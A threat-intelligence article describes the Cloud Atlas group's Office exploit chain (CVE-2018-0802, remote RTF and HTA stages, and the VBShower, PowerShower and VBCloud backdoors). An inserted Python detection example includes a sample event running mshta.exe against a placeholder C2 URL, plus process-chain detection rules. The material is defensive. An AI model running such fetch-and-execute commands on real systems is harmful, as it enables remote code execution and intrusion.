Threat Actors Exploiting Microsoft Office Vulnerability for Malicious Code Execution

A sophisticated cyber-espionage group, Cloud Atlas, has been identified as exploiting a critical vulnerability in Microsoft Office to carry out targeted attacks against organizations in Eastern Europe and Central Asia. Active since 2014, this group has recently introduced an advanced toolset that enhances its capabilities to evade detection and infiltrate high-value targets.
Infection Vector and Attack Mechanism
Cloud Atlas primarily relies on carefully crafted phishing emails carrying malicious documents. These documents exploit a vulnerability in Microsoft Office's formula editor, tracked as CVE-2018-0802, to start a multi-stage infection chain that ends in the deployment of sophisticated backdoors. When a victim opens the malicious document, it fetches a remote template file in RTF format from an attacker-controlled server.
This RTF template exploits the formula editor vulnerability, which subsequently downloads and executes an HTML Application (HTA) file from the same command and control (C2) server. To minimize detection risks, Cloud Atlas imposes strict controls on malware distribution, allowing RTF and HTA file downloads only during specific time frames and from designated IP addresses within targeted regions.
Execution of Malicious Payloads
Once executed, the HTA file extracts and installs various components of the VBShower backdoor onto the victim's system. VBShower then proceeds to download another backdoor known as PowerShower. This infection method has shown remarkable consistency since its initial discovery in 2019, with only minor adjustments over time.
In a notable shift in tactics, Cloud Atlas has introduced a new backdoor called VBCloud, which replicates many functionalities associated with a separate DLL module. VBCloud can download and execute malicious plugins, communicate with cloud servers, and perform various system operations. First detected in August 2023, VBCloud has since undergone multiple variations to maintain its stealth.
The updated attack sequence now includes loading VBCloud via VBShower, which also downloads the PowerShower module. PowerShower is tasked with probing local networks for further infiltration opportunities, while VBCloud focuses on gathering system information and exfiltrating sensitive files.
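The chain described above (Office document, remote RTF template, formula-editor exploit, remote HTA, backdoor stages) leaves process-creation telemetry that a defender can match on. The following is an added detection example, not code from the original report: it assumes the exploited formula editor is the Equation Editor binary EQNEDT32.EXE, which Office starts through COM so that its parent is svchost.exe rather than the Office application, and that the downloaded HTA is run by mshta.exe; the article names neither binary, and the events below are constructed.

```python
import re

# Constructed process-creation events (not real telemetry). Assumption: the
# CVE-2018-0802 exploit runs inside the Equation Editor binary EQNEDT32.EXE,
# which Office starts via COM (parent is svchost.exe, not WINWORD.EXE), and
# the downloaded HTA file is executed by mshta.exe; the article names neither.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",  "cmd": "winword.exe /n report.docx"},
    {"pid": 300, "ppid": 50,  "image": "svchost.exe",  "cmd": "svchost.exe -k DcomLaunch"},
    {"pid": 310, "ppid": 300, "image": "EQNEDT32.EXE", "cmd": "EQNEDT32.EXE -Embedding"},
    {"pid": 320, "ppid": 310, "image": "mshta.exe",    "cmd": "mshta.exe http://c2.example.invalid/t.hta"},
    {"pid": 400, "ppid": 100, "image": "mshta.exe",    "cmd": "mshta.exe C:\\Tools\\helpdesk.hta"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
REMOTE_ARG = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)


def detect_office_hta_chain(events):
    """Return a list of (rule, pid) findings over process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        parent_image = parent["image"].lower() if parent else ""
        # Rule 1: the Equation Editor has no reason to spawn anything, so any
        # child of EQNEDT32.EXE is a strong signal of the exploit stage.
        # Keyed on the child, not on an Office parent, because of the COM launch.
        if parent_image == "eqnedt32.exe":
            findings.append(("eqnedt32_child_process", e["pid"]))
        # Rule 2: mshta.exe pulling its HTA from a URL matches the remote HTA
        # download stage; a local .hta path is left alone to limit noise.
        if image == "mshta.exe" and REMOTE_ARG.search(e["cmd"]):
            findings.append(("mshta_remote_hta", e["pid"]))
        # Rule 3: an Office application spawning the HTA host directly.
        if image == "mshta.exe" and parent_image in OFFICE_APPS:
            findings.append(("office_spawned_mshta", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect_office_hta_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

On the constructed sample only the mshta.exe process fetching a remote HTA (pid 320) is flagged, by two independent rules, while the locally launched HTA (pid 400) is not.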
Targeted Industries and Geographic Focus
Cloud Atlas has shown a particular interest in sectors such as aerospace, international economics, government agencies, and religious organizations. Their operations have impacted countries including Portugal, Romania, Turkey, Ukraine, Russia, Turkmenistan, Afghanistan, and Kyrgyzstan.
The group's continuous evolution and adoption of polymorphic malware techniques underscore the persistent challenges faced by cybersecurity professionals in detecting and mitigating advanced persistent threats.
Conclusion
As Cloud Atlas refines its tools and strategies, organizations within the affected regions must remain vigilant. Implementing robust security measures is essential to defend against these sophisticated cyber-espionage campaigns that exploit vulnerabilities in widely used software like Microsoft Office.